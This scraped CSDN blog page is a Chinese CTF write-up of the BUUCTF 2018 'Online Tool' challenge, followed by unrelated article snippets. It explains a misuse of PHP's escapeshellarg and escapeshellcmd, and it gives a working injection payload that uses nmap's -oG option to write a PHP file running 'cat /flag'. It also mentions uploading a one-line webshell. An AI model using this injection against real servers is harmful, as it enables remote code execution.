## [BUUCTF 2018]Online Tool### 1

最新推荐文章于 2024-08-15 09:23:50 发布
最新推荐文章于 2024-08-15 09:23:50 发布
阅读量253 收藏 9
点赞数 4
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sulide_moon/article/details/138579768
版权 
  1. 考察点:
1. **escapeshellarg和escapeshellcmd使用不当**
2. **namp -oG 1.php**可以写入一个文件
<?php
​
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
  $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}
​
if(!isset($_GET['host'])) {
  highlight_file(__FILE__);
} else {
  $host = $_GET['host'];
  $host = escapeshellarg($host);
  $host = escapeshellcmd($host);
  $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
  echo 'you are in sandbox '.$sandbox;
  @mkdir($sandbox);
  chdir($sandbox);
  echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

    @mkdir($sandbox);: 这一行使用 mkdir() 函数创建一个目录,目录的名称由 $sandbox 变量指定。@ 符号是 PHP 中的错误抑制符号,它会抑制可能出现的 mkdir() 函数调用产生的警告或错误信息,使得即使目录已存在或创建失败,也不会向用户显示错误信息。 chdir($sandbox);: 这一行使用 chdir() 函数改变当前工作目录为 $sandbox 变量指定的目录。这样做之后,任何后续的文件系统操作都将在新的工作目录中进行。

关于escapeshellarg函数和escapeshellcmd函数,简单来说就是前者会把传入的值当作字符串加单引号,然后对其自带的单引号加转义\ 处理,后者就会在一些符号前面加斜杠进行转义,但是对于单引号和双引号的解析只要有一个为单数才会转义(就是没有其他的与其配对)

示例如下:

而nmap的-oG选项可以写入一个函数,所以我们可以上传一句话然后直接连!,也可以直接cat flag

构造payload:

?host=' <?php echo `cat /flag`;?> -oG test.php '

带入目录路径得到:

羊一凡
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[BUUCTF 2018]Online Tool
bazzza的博客
12-25 257
escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数 escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell函数,并且还是确保安全的。对于用户输入的部分参数就应该使用这个函数。shell 函数包含 exec(), system() 执行运算符 。 escapeshellcmd — shell 元字符转义 escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任.
BUUCTF 2018 Online Tool
热门推荐
kid的博客
09-10 1万+
BUUCTF 2018 Online Tool 前言 继续刷题,学习,为了成为黑岛的一名工具人而努力! 感谢大佬提供的环境:https://github.com/glzjin/buuctf_2018_online_tool 过程 搭好环境,打开网页,出现一堆代码 OK,首先代码审计…又是php,头大… remote_addr和x_forwarded_for这两个是见的比较多的,服务器获取ip用...
[BUUCTF 2018]Online Tool1
m0_73673698的博客
06-08 640
将给字符串增加一个单引号并且能引用或者转义任何已经存在的单引号,这样以确保能够直接将一个字符串传入 shell 函数,并且还是确保安全的。接下来是通过get方法传入host参数,经过escapeshellarg和escapeshellcmd两个函数过滤后,拼接到nmap命令后,通过system系统命令来执行命令。发现在nmap命令中 有一个参数-oG可以实现将命令和结果写到文件这个命令就是我们的输入可控!通过上面的操作逃过了单引号,但escapeshellcmd会对这些特殊符号前面加上\来转义…
web buuctf [BUUCTF 2018]Online Tool1
weixin_44214568的博客
03-24 2917
考点:escapeshellarg()和escapeshellcmd()漏洞; RCE漏洞 通过代码审计,传参是host,最后的输出对host利用namp扫描, 主要函数就是 $host = escapeshellarg($host); $host = escapeshellcmd($host); escapeshellarg(): escapeshellarg(string$arg):string 重点:escapeshellarg()将给字符串增加一个单引号并且能引用或...
C#预处理指令之#line,#pragma warning 详细解析
09-04
// CS0168 on line 200 #line default char c; // CS0168 on line 9 } } ``` 在这个例子中,尽管行`int i;`实际上位于第7行,`#line 200`指令告诉编译器将其标记为第200行。当出现错误或警告时,编译器会报告...
hehe245_#rf_
10-02
(You should upload 5 codes/documents files)(Pay online to activate your account)
FsSql:ADO.NET的F#功能包装
02-17
FsSql提供了ADO的功能接口。... 特征: 连接管理 DBNull <->选项类型转换 ... Debug.WriteLine (sprintf "%A" line) member x.Debug fLine = Debug.WriteLine (sprintf "%A" (fLine ())) member x.Verbo
C语言中##的用法总结
08-10
#define ___ANONYMOUS1(type, var, line) type var##line #define __ANONYMOUS0(type, line) ___ANONYMOUS1(type, _anonymous, line) #define ANONYMOUS(type) __ANONYMOUS0(type, __LINE__) ``` 使用`ANONYMOUS`宏...
[RF-Chaos]ManualPatch_#kontol_源码
10-04
【RF-Chaos】ManualPatch_#kontol_源码是一个针对网络游戏RF Online(Rising Force Online)的修改或优化工具,其主要目的是为了提升游戏体验或者解决游戏中出现的问题。RF Online是一款科幻背景的大型多人在线角色...
安全工具推荐-Search_Viewer资产测绘】
qq_55213436的博客
08-14 124
Search_Viewer,集Fofa、Hunter鹰图、Shodan、360 quake、Zoomeye 钟馗之眼、censys 为一体的空间测绘gui图形界面化工具,支持一键采集爬取和导出fofa、shodan等数据,方便快捷查看。包含语法帮助手册,忘记查询语法也能方便查看语法,渗透不二之选。
等保测评中的安全需求分析:构建精准的信息安全防护体系
最新发布
w13359990065的博客
08-15 504
在实施数字化转型的过程中,企业应将安全需求分析视为持续优化安全防护体系的关键环节,通过跨部门合作、员工培训、技术应用等策略,不断调整和优化安全需求,为业务的持续健康发展提供坚实的安全保障。某金融机构通过等保测评的指导,实施了详细的安全需求分析,识别了其关键业务功能和信息资产,包括客户数据、交易系统等,基于风险评估的结果,制定了针对性的安全控制措施,如多因素认证、数据加密、网络隔离等,有效提升了信息安全防护水平。实施安全需求分析的过程中,企业可能面临一些挑战,如技术更新快、业务需求变化频繁、安全资源有限等。
[Linux]车联网安全-大佬都在用的渗透测试系统
Liyu_6618的博客
08-12 286
天刃是一个基于Ubuntu 18.04的车联网渗透测试发行版系统,主要用于针对车联网设备进行安全评估。系统内置上百个车联网安全测试专用工具,旨在解决车联网安全从业人员测试工具杂乱、测试环境配置复杂、无工具可用等一系列问题。本系统提供ISO镜像安装与OVA镜像导入方式安装,推荐使用OVA导入虚拟机操作更为简单方便。覆盖逆向、CAN、车载以太网、WiFi、蓝牙、云平台等安全测试。导入或安装成功后开机使用iov/root进行登录,登录成功后会显示用户体验计划,可选择同意或拒绝,确认完成后即可开始使用。
便携式手提加固计算机:搭载飞腾4核/8核处理器的加固计算机
Future_2024的博客
08-13 566
便携式手提加固计算机:搭载飞腾4核/8核处理器的加固计算机
ctf 堆栈结构
qq_69100706的博客
08-12 359
CTF(Capture The Flag)竞赛中,理解堆栈结构对于解决涉及二进制分析、逆向工程和利用开发的挑战至关重要。堆栈是在程序执行过程中用于临时存储数据和管理函数调用的关键数据结构。
Scout Suite:开源云安全审计工具
网络研究观
08-12 284
Scout Suite 是一个开源、多云安全审计工具,旨在评估云环境的安全态势。
奥运会期间网络安全防护的重要性
gmqqcsdn的博客
08-12 492
它为运动员提供了公平竞争的舞台,为观众带来了精彩的观赛体验,也维护了奥运会的尊严和声誉。想象一下,如果奥运会的官方网站被黑客攻击,发布了虚假的赛事结果或负面信息,那将对奥运会的公信力造成极大的冲击。赛事的组织协调、运动员的信息管理、观众的票务与服务,无一不依赖于网络的稳定运行。通过强大的网络安全防护体系,能够及时检测和抵御这些威胁,保障网络的正常运行。北京时间凌晨3点,历史17天的巴黎奥运会迎来落幕,在此先祝贺伟大的祖国获得了总奖牌榜第二,金牌榜并列第一的好成绩,对征战在奥运会赛场的运动健儿们致敬!
同态加密和SEAL库的介绍(十)CKKS 参数心得 2
WaitMrAnt的博客
08-12 725
本篇继续上篇针对 CKKS 方案的测试,首先证明了重新线性化虽然会减少密文长度,但是并不会对计算结果的精度有明显的影响;模数链的长度确实会限制乘法深度(具体来说是 Rescale 次数),这点上密文乘法和明文乘法相同;上篇中证明了增加 scale 会提高精度,本篇也证明了增长模数链也能增加精度,但是内存测试后,前者 scale 不会提高内存,后者会增加内存成本和时间成本。
Linux 主机一键安全整改策略
weixin_45840241的博客
08-15 431
echo "---------ssh登录前警告banner设置----------"echo "---------禁止root用户远程登录----------"echo "---------设置用户密码过期时间----------"echo "---------设置密码复杂度限制----------"echo "---------配置pacct工具----------"echo "---------禁用不必要的别名----------"安装配置记录用户对设备的操作的pacct工具;
#ifdef USE_LINE_L1
07-28
`#ifdef USE_LINE_L1` 是一个条件编译的预处理指令,它用于判断宏定义`USE_LINE_L1`是否已经被定义。如果`USE_LINE_L1`已经被定义,则编译预处理器会对`#ifdef`和`#endif`之间的代码块进行编译。 在这段代码中,`#ifdef USE_LINE_L1`用于判断是否需要初始化名为`LineWalk_L1_PIN`所对应的引脚。如果`USE_LINE_L1`宏已经被定义,则执行`#ifdef`和`#endif`之间的代码块。 在代码块中,先使用`RCC_APB2PeriphClockCmd()`函数使能引脚所在GPIO端口的时钟,然后通过配置`GPIO_InitStructure`结构体的成员变量,设置引脚的参数。最后,通过调用`GPIO_Init()`函数来初始化GPIO引脚。 需要注意的是,这段代码中的具体宏定义和引脚定义没有给出,所以无法确定具体是哪个引脚以及它们对应的时钟使能和初始化参数。如果需要完整的代码信息,请提供完整的代码或者提供相应的宏定义和引脚定义。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值